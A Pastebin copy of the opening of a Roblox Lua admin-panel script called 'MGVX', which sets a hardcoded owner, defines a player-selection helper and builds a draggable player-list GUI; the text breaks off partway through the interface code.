Advertisement
Guest User

Untitled

a guest
Jan 21st, 2017
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 77.66 KB | None | 0 0
  1. print("MGVX LOADED")
  2.  
  3. local CoreValues = Instance.new("Folder")
  4. CoreValues.Name = "MGVXCore"
  5. CoreValues.Parent = game
  6.  
  7.  
  8. local Http = game:GetService("HttpService")
  9. local gWorkspace = game:GetService("Workspace")
  10. local OwnerGui = game:GetService("Players")['Jech_X'].PlayerGui
  11. local Players = game:GetService("Players")
  12. local Website = "http://mgvx.tk/"
  13.  
  14. -- Makes Sure EveryThing Goes Ok!---
  15. print("MGVX LOADED")
  16.  
  17.  
  18. --------
  19. --local WhiteList = Http:GetAsync(Website)
  20. local BlackListed = {}
  21.  
  22. -- Variables---
  23. --[[for i,v in pairs(game.Players:GetChildren()) do
  24. if string.find(WhiteList, ",") then
  25. local sep = true
  26. if string.find(WhiteList, v.UserId) then
  27. Owner = game:GetService("Players"):WaitForChild(v.Name)
  28. end
  29. end
  30. end]]
  31. Owner = game:GetService("Players")['Jech_X']
  32.  
  33. local plr = Owner
  34.  
  35.  
  36.  
  37. if Owner == nil then
  38. Owner = game.Players.LocalPlayer
  39. end
  40.  
  41. if plr == nil then
  42. plr = Owner
  43. end
  44.  
  45.  
  46. ------------Functions----------
  47. function GetPlr(plr, str)
  48. local plrz = {} str = str:lower()
  49. if str == "all" then plrz = game.Players:children()
  50. elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v) end end
  51. else
  52. local sn = {1} local en = {}
  53. for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  54. for x = 1, #sn do
  55. if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") then table.insert(plrz, plr)
  56. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") then table.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  57. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  58. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  59. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  60. end end end
  61. elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  62. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  63. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  64. end end end
  65. else
  66. for a, plyr in pairs(game.Players:children()) do
  67. if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or (sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" and plyr.Name:lower():find(str) == 1) then
  68. table.insert(plrz, plyr) break
  69. end
  70. end
  71. end
  72. end
  73. end
  74. return plrz
  75. end
  76.  
  77.  
  78.  
  79.  
  80. local OwnerV = Instance.new("StringValue")
  81. OwnerV.Name = "Owner"
  82. OwnerV.Value = Owner.Name
  83. OwnerV.Parent = CoreValues
  84.  
  85.  
  86.  
  87. local NewGuiPart1 = Instance.new("ScreenGui")
  88. NewGuiPart1.Name = "MGVX"
  89. NewGuiPart1.Parent = Owner.PlayerGui
  90.  
  91.  
  92.  
  93. -------
  94. local NewGuiPart2 = Instance.new("Frame")
  95. NewGuiPart2.Active = true
  96. NewGuiPart2.Position = UDim2.new(0.368000001, 0, 0.0829999968, 0)
  97. NewGuiPart2.Size = UDim2.new(0, 300, 0, 350)
  98. NewGuiPart2.Style = Enum.FrameStyle.DropShadow
  99. NewGuiPart2.ClipsDescendants = true
  100. NewGuiPart2.Draggable = true
  101. NewGuiPart2.Parent = NewGuiPart1
  102. -------
  103. local NewGuiPart3 = Instance.new("TextButton")
  104. NewGuiPart3.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  105. NewGuiPart3.BackgroundTransparency = 0.69999998807907
  106. NewGuiPart3.BorderColor3 = Color3.new(0, 0, 0)
  107. NewGuiPart3.BorderSizePixel = 0
  108. NewGuiPart3.Name = "TL1"
  109. NewGuiPart3.Position = UDim2.new(0, 200, 0, 0)
  110. NewGuiPart3.Selectable = true
  111. NewGuiPart3.Size = UDim2.new(0, 80, 0, 20)
  112. NewGuiPart3.Style = Enum.ButtonStyle.Custom
  113. NewGuiPart3.FontSize = Enum.FontSize.Size14
  114. NewGuiPart3.Text = "Refresh"
  115. NewGuiPart3.TextColor3 = Color3.new(1, 1, 1)
  116. NewGuiPart3.Parent = NewGuiPart2
  117. -------
  118. local NewGuiPart4 = Instance.new("TextLabel")
  119. NewGuiPart4.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  120. NewGuiPart4.BackgroundTransparency = 1
  121. NewGuiPart4.BorderColor3 = Color3.new(0, 0, 0)
  122. NewGuiPart4.BorderSizePixel = 0
  123. NewGuiPart4.Name = "TL2"
  124. NewGuiPart4.Position = UDim2.new(0, 50, 0, 0)
  125. NewGuiPart4.Size = UDim2.new(0, 80, 0, 20)
  126. NewGuiPart4.FontSize = Enum.FontSize.Size14
  127. NewGuiPart4.Text = "Loading..."
  128. NewGuiPart4.TextColor3 = Color3.new(1, 1, 1)
  129. NewGuiPart4.TextScaled = true
  130. NewGuiPart4.TextWrapped = true
  131. NewGuiPart4.Parent = NewGuiPart2
  132. -------
  133. local NewGuiPart5 = Instance.new("Frame")
  134. NewGuiPart5.BackgroundColor3 = Color3.new(0, 0, 0)
  135. NewGuiPart5.BackgroundTransparency = 1
  136. NewGuiPart5.BorderSizePixel = 5
  137. NewGuiPart5.Name = "Main"
  138. NewGuiPart5.Position = UDim2.new(1, -280, 0.0829999968, 0)
  139. NewGuiPart5.Size = UDim2.new(0, 250, 0, 300)
  140. NewGuiPart5.Visible = false
  141. NewGuiPart5.Draggable = true
  142. NewGuiPart5.Parent = NewGuiPart2
  143. -------
  144. local NewGuiPart6 = Instance.new("ScrollingFrame")
  145. NewGuiPart6.BackgroundTransparency = 1
  146. NewGuiPart6.Name = "PlayerList"
  147. NewGuiPart6.Position = UDim2.new(0, -7, 0, -10)
  148. NewGuiPart6.Selectable = true
  149. NewGuiPart6.Size = UDim2.new(0, 290, 0, 320)
  150. NewGuiPart6.ClipsDescendants = true
  151. NewGuiPart6.Parent = NewGuiPart5
  152. -------
  153. local NewGuiPart7 = Instance.new("Frame")
  154. NewGuiPart7.BackgroundColor3 = Color3.new(0, 0, 0)
  155. NewGuiPart7.BackgroundTransparency = 1
  156. NewGuiPart7.BorderSizePixel = 0
  157. NewGuiPart7.Size = UDim2.new(0, 290, 0, 35)
  158. NewGuiPart7.Parent = NewGuiPart6
  159. -------
  160. local NewGuiPart8 = Instance.new("ImageLabel")
  161. NewGuiPart8.Active = false
  162. NewGuiPart8.BackgroundTransparency = 1
  163. NewGuiPart8.BorderSizePixel = 0
  164. NewGuiPart8.Position = UDim2.new(0, 10, 0, 15)
  165. NewGuiPart8.Selectable = false
  166. NewGuiPart8.Size = UDim2.new(0, 65, 0, 25)
  167. NewGuiPart8.Image = "http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username=ROBLOX"
  168. NewGuiPart8.Parent = NewGuiPart7
  169. -------
  170. local NewGuiPart9 = Instance.new("TextLabel")
  171. NewGuiPart9.BackgroundTransparency = 1
  172. NewGuiPart9.BorderSizePixel = 0
  173. NewGuiPart9.Position = UDim2.new(0, 100, 0, 15)
  174. NewGuiPart9.Size = UDim2.new(0, 100, 0, 25)
  175. NewGuiPart9.Font = Enum.Font.Legacy
  176. NewGuiPart9.FontSize = Enum.FontSize.Size10
  177. NewGuiPart9.Text = ""
  178. NewGuiPart9.TextColor3 = Color3.new(1, 1, 1)
  179. NewGuiPart9.TextScaled = true
  180. NewGuiPart9.TextWrapped = true
  181. NewGuiPart9.Parent = NewGuiPart7
  182. -------
  183. local NewGuiPart10 = Instance.new("Frame")
  184. NewGuiPart10.BackgroundColor3 = Color3.new(0, 0, 0)
  185. NewGuiPart10.BackgroundTransparency = 1
  186. NewGuiPart10.BorderSizePixel = 0
  187. NewGuiPart10.Position = UDim2.new(0, 0, 0, 35)
  188. NewGuiPart10.Size = UDim2.new(0, 290, 0, 35)
  189. NewGuiPart10.Parent = NewGuiPart6
  190. -------
  191. local NewGuiPart11 = Instance.new("ImageLabel")
  192. NewGuiPart11.Active = false
  193. NewGuiPart11.BackgroundTransparency = 1
  194. NewGuiPart11.BorderSizePixel = 0
  195. NewGuiPart11.Position = UDim2.new(0, 10, 0, 15)
  196. NewGuiPart11.Selectable = false
  197. NewGuiPart11.Size = UDim2.new(0, 65, 0, 25)
  198. NewGuiPart11.Image = ""
  199. NewGuiPart11.Parent = NewGuiPart10
  200. -------
  201. local NewGuiPart12 = Instance.new("TextLabel")
  202. NewGuiPart12.BackgroundTransparency = 1
  203. NewGuiPart12.BorderSizePixel = 0
  204. NewGuiPart12.Position = UDim2.new(0, 100, 0, 15)
  205. NewGuiPart12.Size = UDim2.new(0, 100, 0, 25)
  206. NewGuiPart12.Font = Enum.Font.Legacy
  207. NewGuiPart12.FontSize = Enum.FontSize.Size10
  208. NewGuiPart12.Text = ""
  209. NewGuiPart12.TextColor3 = Color3.new(1, 1, 1)
  210. NewGuiPart12.TextScaled = true
  211. NewGuiPart12.TextWrapped = true
  212. NewGuiPart12.Parent = NewGuiPart10
  213. -------
  214. local NewGuiPart13 = Instance.new("Frame")
  215. NewGuiPart13.BackgroundColor3 = Color3.new(0, 0, 0)
  216. NewGuiPart13.BackgroundTransparency = 1
  217. NewGuiPart13.BorderSizePixel = 0
  218. NewGuiPart13.Position = UDim2.new(0, 0, 0, 70)
  219. NewGuiPart13.Size = UDim2.new(0, 290, 0, 35)
  220. NewGuiPart13.Parent = NewGuiPart6
  221. -------
  222. local NewGuiPart14 = Instance.new("ImageLabel")
  223. NewGuiPart14.Active = false
  224. NewGuiPart14.BackgroundTransparency = 1
  225. NewGuiPart14.BorderSizePixel = 0
  226. NewGuiPart14.Position = UDim2.new(0, 10, 0, 15)
  227. NewGuiPart14.Selectable = false
  228. NewGuiPart14.Size = UDim2.new(0, 65, 0, 25)
  229. NewGuiPart14.Image = ""
  230. NewGuiPart14.Image = ""
  231. NewGuiPart14.Parent = NewGuiPart13
  232. -------
  233. local NewGuiPart15 = Instance.new("TextLabel")
  234. NewGuiPart15.BackgroundTransparency = 1
  235. NewGuiPart15.BorderSizePixel = 0
  236. NewGuiPart15.Position = UDim2.new(0, 100, 0, 15)
  237. NewGuiPart15.Size = UDim2.new(0, 100, 0, 25)
  238. NewGuiPart15.Font = Enum.Font.Legacy
  239. NewGuiPart15.FontSize = Enum.FontSize.Size10
  240. NewGuiPart15.Text = ""
  241. NewGuiPart15.TextColor3 = Color3.new(1, 1, 1)
  242. NewGuiPart15.TextScaled = true
  243. NewGuiPart15.TextWrapped = true
  244. NewGuiPart15.Parent = NewGuiPart13
  245. -------
  246. local NewGuiPart16 = Instance.new("Frame")
  247. NewGuiPart16.BackgroundColor3 = Color3.new(0, 0, 0)
  248. NewGuiPart16.BackgroundTransparency = 1
  249. NewGuiPart16.BorderSizePixel = 0
  250. NewGuiPart16.Position = UDim2.new(0, 0, 0, 105)
  251. NewGuiPart16.Size = UDim2.new(0, 290, 0, 35)
  252. NewGuiPart16.Parent = NewGuiPart6
  253. -------
  254. local NewGuiPart17 = Instance.new("ImageLabel")
  255. NewGuiPart17.Active = false
  256. NewGuiPart17.BackgroundTransparency = 1
  257. NewGuiPart17.BorderSizePixel = 0
  258. NewGuiPart17.Position = UDim2.new(0, 10, 0, 15)
  259. NewGuiPart17.Selectable = false
  260. NewGuiPart17.Size = UDim2.new(0, 65, 0, 25)
  261. NewGuiPart17.Image = ""
  262. NewGuiPart17.Image = ""
  263. NewGuiPart17.Parent = NewGuiPart16
  264. -------
  265. local NewGuiPart18 = Instance.new("TextLabel")
  266. NewGuiPart18.BackgroundTransparency = 1
  267. NewGuiPart18.BorderSizePixel = 0
  268. NewGuiPart18.Position = UDim2.new(0, 100, 0, 15)
  269. NewGuiPart18.Size = UDim2.new(0, 100, 0, 25)
  270. NewGuiPart18.Font = Enum.Font.Legacy
  271. NewGuiPart18.FontSize = Enum.FontSize.Size10
  272. NewGuiPart18.Text = ""
  273. NewGuiPart18.TextColor3 = Color3.new(1, 1, 1)
  274. NewGuiPart18.TextScaled = true
  275. NewGuiPart18.TextWrapped = true
  276. NewGuiPart18.Parent = NewGuiPart16
  277. -------
  278. local NewGuiPart19 = Instance.new("Frame")
  279. NewGuiPart19.BackgroundColor3 = Color3.new(0, 0, 0)
  280. NewGuiPart19.BackgroundTransparency = 1
  281. NewGuiPart19.BorderSizePixel = 0
  282. NewGuiPart19.Position = UDim2.new(0, 0, 0, 140)
  283. NewGuiPart19.Size = UDim2.new(0, 290, 0, 35)
  284. NewGuiPart19.Parent = NewGuiPart6
  285. -------
  286. local NewGuiPart20 = Instance.new("ImageLabel")
  287. NewGuiPart20.Active = false
  288. NewGuiPart20.BackgroundTransparency = 1
  289. NewGuiPart20.BorderSizePixel = 0
  290. NewGuiPart20.Position = UDim2.new(0, 10, 0, 15)
  291. NewGuiPart20.Selectable = false
  292. NewGuiPart20.Size = UDim2.new(0, 65, 0, 25)
  293. NewGuiPart20.Image = ""
  294. NewGuiPart20.Image = ""
  295. NewGuiPart20.Parent = NewGuiPart19
  296. -------
  297. local NewGuiPart21 = Instance.new("TextLabel")
  298. NewGuiPart21.BackgroundTransparency = 1
  299. NewGuiPart21.BorderSizePixel = 0
  300. NewGuiPart21.Position = UDim2.new(0, 100, 0, 15)
  301. NewGuiPart21.Size = UDim2.new(0, 100, 0, 25)
  302. NewGuiPart21.Font = Enum.Font.Legacy
  303. NewGuiPart21.FontSize = Enum.FontSize.Size10
  304. NewGuiPart21.Text = ""
  305. NewGuiPart21.TextColor3 = Color3.new(1, 1, 1)
  306. NewGuiPart21.TextScaled = true
  307. NewGuiPart21.TextWrapped = true
  308. NewGuiPart21.Parent = NewGuiPart19
  309. -------
  310. local NewGuiPart22 = Instance.new("Frame")
  311. NewGuiPart22.BackgroundColor3 = Color3.new(0, 0, 0)
  312. NewGuiPart22.BackgroundTransparency = 1
  313. NewGuiPart22.BorderSizePixel = 0
  314. NewGuiPart22.Position = UDim2.new(0, 0, 0, 175)
  315. NewGuiPart22.Size = UDim2.new(0, 290, 0, 35)
  316. NewGuiPart22.Parent = NewGuiPart6
  317. -------
  318. local NewGuiPart23 = Instance.new("ImageLabel")
  319. NewGuiPart23.Active = false
  320. NewGuiPart23.BackgroundTransparency = 1
  321. NewGuiPart23.BorderSizePixel = 0
  322. NewGuiPart23.Position = UDim2.new(0, 10, 0, 15)
  323. NewGuiPart23.Selectable = false
  324. NewGuiPart23.Size = UDim2.new(0, 65, 0, 25)
  325. NewGuiPart23.Image = ""
  326. NewGuiPart23.Image = ""
  327. NewGuiPart23.Parent = NewGuiPart22
  328. -------
  329. local NewGuiPart24 = Instance.new("TextLabel")
  330. NewGuiPart24.BackgroundTransparency = 1
  331. NewGuiPart24.BorderSizePixel = 0
  332. NewGuiPart24.Position = UDim2.new(0, 100, 0, 15)
  333. NewGuiPart24.Size = UDim2.new(0, 100, 0, 25)
  334. NewGuiPart24.Font = Enum.Font.Legacy
  335. NewGuiPart24.FontSize = Enum.FontSize.Size10
  336. NewGuiPart24.Text = ""
  337. NewGuiPart24.TextColor3 = Color3.new(1, 1, 1)
  338. NewGuiPart24.TextScaled = true
  339. NewGuiPart24.TextWrapped = true
  340. NewGuiPart24.Parent = NewGuiPart22
  341. -------
  342. local NewGuiPart25 = Instance.new("Frame")
  343. NewGuiPart25.BackgroundColor3 = Color3.new(0, 0, 0)
  344. NewGuiPart25.BackgroundTransparency = 1
  345. NewGuiPart25.BorderSizePixel = 0
  346. NewGuiPart25.Position = UDim2.new(0, 0, 0, 205)
  347. NewGuiPart25.Size = UDim2.new(0, 290, 0, 35)
  348. NewGuiPart25.Parent = NewGuiPart6
  349. -------
  350. local NewGuiPart26 = Instance.new("ImageLabel")
  351. NewGuiPart26.Active = false
  352. NewGuiPart26.BackgroundTransparency = 1
  353. NewGuiPart26.BorderSizePixel = 0
  354. NewGuiPart26.Position = UDim2.new(0, 10, 0, 15)
  355. NewGuiPart26.Selectable = false
  356. NewGuiPart26.Size = UDim2.new(0, 65, 0, 25)
  357. NewGuiPart26.Image = ""
  358. NewGuiPart26.Image = ""
  359. NewGuiPart26.Parent = NewGuiPart25
  360. -------
  361. local NewGuiPart27 = Instance.new("TextLabel")
  362. NewGuiPart27.BackgroundTransparency = 1
  363. NewGuiPart27.BorderSizePixel = 0
  364. NewGuiPart27.Position = UDim2.new(0, 100, 0, 15)
  365. NewGuiPart27.Size = UDim2.new(0, 100, 0, 25)
  366. NewGuiPart27.Font = Enum.Font.Legacy
  367. NewGuiPart27.FontSize = Enum.FontSize.Size10
  368. NewGuiPart27.Text = ""
  369. NewGuiPart27.TextColor3 = Color3.new(1, 1, 1)
  370. NewGuiPart27.TextScaled = true
  371. NewGuiPart27.TextWrapped = true
  372. NewGuiPart27.Parent = NewGuiPart25
  373. -------
  374. local NewGuiPart28 = Instance.new("Frame")
  375. NewGuiPart28.BackgroundColor3 = Color3.new(0, 0, 0)
  376. NewGuiPart28.BackgroundTransparency = 1
  377. NewGuiPart28.BorderSizePixel = 0
  378. NewGuiPart28.Position = UDim2.new(0, 0, 0, 240)
  379. NewGuiPart28.Size = UDim2.new(0, 290, 0, 35)
  380. NewGuiPart28.Parent = NewGuiPart6
  381. -------
  382. local NewGuiPart29 = Instance.new("ImageLabel")
  383. NewGuiPart29.Active = false
  384. NewGuiPart29.BackgroundTransparency = 1
  385. NewGuiPart29.BorderSizePixel = 0
  386. NewGuiPart29.Position = UDim2.new(0, 10, 0, 15)
  387. NewGuiPart29.Selectable = false
  388. NewGuiPart29.Size = UDim2.new(0, 65, 0, 25)
  389. NewGuiPart29.Image = ""
  390. NewGuiPart29.Image = ""
  391. NewGuiPart29.Parent = NewGuiPart28
  392. -------
  393. local NewGuiPart30 = Instance.new("TextLabel")
  394. NewGuiPart30.BackgroundTransparency = 1
  395. NewGuiPart30.BorderSizePixel = 0
  396. NewGuiPart30.Position = UDim2.new(0, 100, 0, 15)
  397. NewGuiPart30.Size = UDim2.new(0, 100, 0, 25)
  398. NewGuiPart30.Font = Enum.Font.Legacy
  399. NewGuiPart30.FontSize = Enum.FontSize.Size10
  400. NewGuiPart30.Text = ""
  401. NewGuiPart30.TextColor3 = Color3.new(1, 1, 1)
  402. NewGuiPart30.TextScaled = true
  403. NewGuiPart30.TextWrapped = true
  404. NewGuiPart30.Parent = NewGuiPart28
  405. -------
  406. local NewGuiPart31 = Instance.new("Frame")
  407. NewGuiPart31.BackgroundColor3 = Color3.new(0, 0, 0)
  408. NewGuiPart31.BackgroundTransparency = 1
  409. NewGuiPart31.BorderSizePixel = 0
  410. NewGuiPart31.Position = UDim2.new(0, 0, 0, 275)
  411. NewGuiPart31.Size = UDim2.new(0, 290, 0, 35)
  412. NewGuiPart31.Parent = NewGuiPart6
  413. -------
  414. local NewGuiPart32 = Instance.new("ImageLabel")
  415. NewGuiPart32.Active = false
  416. NewGuiPart32.BackgroundTransparency = 1
  417. NewGuiPart32.BorderSizePixel = 0
  418. NewGuiPart32.Position = UDim2.new(0, 10, 0, 15)
  419. NewGuiPart32.Selectable = false
  420. NewGuiPart32.Size = UDim2.new(0, 65, 0, 25)
  421. NewGuiPart32.Image = ""
  422. NewGuiPart32.Image = ""
  423. NewGuiPart32.Parent = NewGuiPart31
  424. -------
  425. local NewGuiPart33 = Instance.new("TextLabel")
  426. NewGuiPart33.BackgroundTransparency = 1
  427. NewGuiPart33.BorderSizePixel = 0
  428. NewGuiPart33.Position = UDim2.new(0, 100, 0, 15)
  429. NewGuiPart33.Size = UDim2.new(0, 100, 0, 25)
  430. NewGuiPart33.Font = Enum.Font.Legacy
  431. NewGuiPart33.FontSize = Enum.FontSize.Size10
  432. NewGuiPart33.Text = ""
  433. NewGuiPart33.TextColor3 = Color3.new(1, 1, 1)
  434. NewGuiPart33.TextScaled = true
  435. NewGuiPart33.TextWrapped = true
  436. NewGuiPart33.Parent = NewGuiPart31
  437. -------
  438. local NewGuiPart34 = Instance.new("Frame")
  439. NewGuiPart34.BackgroundColor3 = Color3.new(0, 0, 0)
  440. NewGuiPart34.BackgroundTransparency = 1
  441. NewGuiPart34.BorderSizePixel = 0
  442. NewGuiPart34.Position = UDim2.new(0, 0, 0, 305)
  443. NewGuiPart34.Size = UDim2.new(0, 290, 0, 35)
  444. NewGuiPart34.Parent = NewGuiPart6
  445. -------
  446. local NewGuiPart35 = Instance.new("ImageLabel")
  447. NewGuiPart35.Active = false
  448. NewGuiPart35.BackgroundTransparency = 1
  449. NewGuiPart35.BorderSizePixel = 0
  450. NewGuiPart35.Position = UDim2.new(0, 10, 0, 15)
  451. NewGuiPart35.Selectable = false
  452. NewGuiPart35.Size = UDim2.new(0, 65, 0, 25)
  453. NewGuiPart35.Image = ""
  454. NewGuiPart35.Image = ""
  455. NewGuiPart35.Parent = NewGuiPart34
  456. -------
  457. local NewGuiPart36 = Instance.new("TextLabel")
  458. NewGuiPart36.BackgroundTransparency = 1
  459. NewGuiPart36.BorderSizePixel = 0
  460. NewGuiPart36.Position = UDim2.new(0, 100, 0, 15)
  461. NewGuiPart36.Size = UDim2.new(0, 100, 0, 25)
  462. NewGuiPart36.Font = Enum.Font.Legacy
  463. NewGuiPart36.FontSize = Enum.FontSize.Size10
  464. NewGuiPart36.Text = ""
  465. NewGuiPart36.TextColor3 = Color3.new(1, 1, 1)
  466. NewGuiPart36.TextScaled = true
  467. NewGuiPart36.TextWrapped = true
  468. NewGuiPart36.Parent = NewGuiPart34
  469. -------
  470. local NewGuiPart37 = Instance.new("Frame")
  471. NewGuiPart37.BackgroundColor3 = Color3.new(0, 0, 0)
  472. NewGuiPart37.BackgroundTransparency = 1
  473. NewGuiPart37.BorderSizePixel = 0
  474. NewGuiPart37.Position = UDim2.new(0, 0, 0, 345)
  475. NewGuiPart37.Size = UDim2.new(0, 290, 0, 35)
  476. NewGuiPart37.Parent = NewGuiPart6
  477. -------
  478. local NewGuiPart38 = Instance.new("ImageLabel")
  479. NewGuiPart38.Active = false
  480. NewGuiPart38.BackgroundTransparency = 1
  481. NewGuiPart38.BorderSizePixel = 0
  482. NewGuiPart38.Position = UDim2.new(0, 10, 0, 15)
  483. NewGuiPart38.Selectable = false
  484. NewGuiPart38.Size = UDim2.new(0, 65, 0, 25)
  485. NewGuiPart38.Image = ""
  486. NewGuiPart38.Image = ""
  487. NewGuiPart38.Parent = NewGuiPart37
  488. -------
  489. local NewGuiPart39 = Instance.new("TextLabel")
  490. NewGuiPart39.BackgroundTransparency = 1
  491. NewGuiPart39.BorderSizePixel = 0
  492. NewGuiPart39.Position = UDim2.new(0, 100, 0, 15)
  493. NewGuiPart39.Size = UDim2.new(0, 100, 0, 25)
  494. NewGuiPart39.Font = Enum.Font.Legacy
  495. NewGuiPart39.FontSize = Enum.FontSize.Size10
  496. NewGuiPart39.Text = ""
  497. NewGuiPart39.TextColor3 = Color3.new(1, 1, 1)
  498. NewGuiPart39.TextScaled = true
  499. NewGuiPart39.TextWrapped = true
  500. NewGuiPart39.Parent = NewGuiPart37
  501. -------
  502. local NewGuiPart40 = Instance.new("Frame")
  503. NewGuiPart40.BackgroundColor3 = Color3.new(0, 0, 0)
  504. NewGuiPart40.BackgroundTransparency = 1
  505. NewGuiPart40.BorderSizePixel = 0
  506. NewGuiPart40.Position = UDim2.new(0, 0, 0, 375)
  507. NewGuiPart40.Size = UDim2.new(0, 290, 0, 35)
  508. NewGuiPart40.Parent = NewGuiPart6
  509. -------
  510. local NewGuiPart41 = Instance.new("ImageLabel")
  511. NewGuiPart41.Active = false
  512. NewGuiPart41.BackgroundTransparency = 1
  513. NewGuiPart41.BorderSizePixel = 0
  514. NewGuiPart41.Position = UDim2.new(0, 10, 0, 15)
  515. NewGuiPart41.Selectable = false
  516. NewGuiPart41.Size = UDim2.new(0, 65, 0, 25)
  517. NewGuiPart41.Image = ""
  518. NewGuiPart41.Image = ""
  519. NewGuiPart41.Parent = NewGuiPart40
  520. -------
  521. local NewGuiPart42 = Instance.new("TextLabel")
  522. NewGuiPart42.BackgroundTransparency = 1
  523. NewGuiPart42.BorderSizePixel = 0
  524. NewGuiPart42.Position = UDim2.new(0, 100, 0, 15)
  525. NewGuiPart42.Size = UDim2.new(0, 100, 0, 25)
  526. NewGuiPart42.Font = Enum.Font.Legacy
  527. NewGuiPart42.FontSize = Enum.FontSize.Size10
  528. NewGuiPart42.Text = ""
  529. NewGuiPart42.TextColor3 = Color3.new(1, 1, 1)
  530. NewGuiPart42.TextScaled = true
  531. NewGuiPart42.TextWrapped = true
  532. NewGuiPart42.Parent = NewGuiPart40
  533. -------
  534. local NewGuiPart43 = Instance.new("Frame")
  535. NewGuiPart43.BackgroundColor3 = Color3.new(0, 0, 0)
  536. NewGuiPart43.BackgroundTransparency = 1
  537. NewGuiPart43.BorderSizePixel = 0
  538. NewGuiPart43.Position = UDim2.new(0, 0, 0, 405)
  539. NewGuiPart43.Size = UDim2.new(0, 290, 0, 35)
  540. NewGuiPart43.Parent = NewGuiPart6
  541. -------
  542. local NewGuiPart44 = Instance.new("ImageLabel")
  543. NewGuiPart44.Active = false
  544. NewGuiPart44.BackgroundTransparency = 1
  545. NewGuiPart44.BorderSizePixel = 0
  546. NewGuiPart44.Position = UDim2.new(0, 10, 0, 15)
  547. NewGuiPart44.Selectable = false
  548. NewGuiPart44.Size = UDim2.new(0, 65, 0, 25)
  549. NewGuiPart44.Image = ""
  550. NewGuiPart44.Image = ""
  551. NewGuiPart44.Parent = NewGuiPart43
  552. -------
  553. local NewGuiPart45 = Instance.new("TextLabel")
  554. NewGuiPart45.BackgroundTransparency = 1
  555. NewGuiPart45.BorderSizePixel = 0
  556. NewGuiPart45.Position = UDim2.new(0, 100, 0, 15)
  557. NewGuiPart45.Size = UDim2.new(0, 100, 0, 25)
  558. NewGuiPart45.Font = Enum.Font.Legacy
  559. NewGuiPart45.FontSize = Enum.FontSize.Size10
  560. NewGuiPart45.Text = ""
  561. NewGuiPart45.TextColor3 = Color3.new(1, 1, 1)
  562. NewGuiPart45.TextScaled = true
  563. NewGuiPart45.TextWrapped = true
  564. NewGuiPart45.Parent = NewGuiPart43
  565. -------
  566. local NewGuiPart46 = Instance.new("Frame")
  567. NewGuiPart46.BackgroundColor3 = Color3.new(0, 0, 0)
  568. NewGuiPart46.BackgroundTransparency = 1
  569. NewGuiPart46.BorderSizePixel = 0
  570. NewGuiPart46.Position = UDim2.new(0, 0, 0, 445)
  571. NewGuiPart46.Size = UDim2.new(0, 290, 0, 35)
  572. NewGuiPart46.Parent = NewGuiPart6
  573. -------
  574. local NewGuiPart47 = Instance.new("ImageLabel")
  575. NewGuiPart47.Active = false
  576. NewGuiPart47.BackgroundTransparency = 1
  577. NewGuiPart47.BorderSizePixel = 0
  578. NewGuiPart47.Position = UDim2.new(0, 10, 0, 15)
  579. NewGuiPart47.Selectable = false
  580. NewGuiPart47.Size = UDim2.new(0, 65, 0, 25)
  581. NewGuiPart47.Image = ""
  582. NewGuiPart47.Image = ""
  583. NewGuiPart47.Parent = NewGuiPart46
  584. -------
  585. local NewGuiPart48 = Instance.new("TextLabel")
  586. NewGuiPart48.BackgroundTransparency = 1
  587. NewGuiPart48.BorderSizePixel = 0
  588. NewGuiPart48.Position = UDim2.new(0, 100, 0, 15)
  589. NewGuiPart48.Size = UDim2.new(0, 100, 0, 25)
  590. NewGuiPart48.Font = Enum.Font.Legacy
  591. NewGuiPart48.FontSize = Enum.FontSize.Size10
  592. NewGuiPart48.Text = ""
  593. NewGuiPart48.TextColor3 = Color3.new(1, 1, 1)
  594. NewGuiPart48.TextScaled = true
  595. NewGuiPart48.TextWrapped = true
  596. NewGuiPart48.Parent = NewGuiPart46
  597. -------
  598. local NewGuiPart49 = Instance.new("TextButton")
  599. NewGuiPart49.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  600. NewGuiPart49.BackgroundTransparency = 0.69999998807907
  601. NewGuiPart49.BorderColor3 = Color3.new(0, 0, 0)
  602. NewGuiPart49.BorderSizePixel = 0
  603. NewGuiPart49.Name = "TL3"
  604. NewGuiPart49.Position = UDim2.new(0, 200, 0, 25)
  605. NewGuiPart49.Selectable = true
  606. NewGuiPart49.Size = UDim2.new(0, 80, 0, 20)
  607. NewGuiPart49.Style = Enum.ButtonStyle.Custom
  608. NewGuiPart49.FontSize = Enum.FontSize.Size14
  609. NewGuiPart49.Text = "Settings"
  610. NewGuiPart49.TextColor3 = Color3.new(1, 1, 1)
  611. NewGuiPart49.Parent = NewGuiPart2
  612. -------
  613. local NewGuiPart50 = Instance.new("Frame")
  614. NewGuiPart50.BackgroundTransparency = 1
  615. NewGuiPart50.Name = "ScrollingFrame"
  616. NewGuiPart50.Position = UDim2.new(0, 0, 0, 50)
  617. NewGuiPart50.Size = UDim2.new(0, 290, 0, 280)
  618. NewGuiPart50.Visible = false
  619. NewGuiPart50.ClipsDescendants = true
  620. NewGuiPart50.Draggable = true
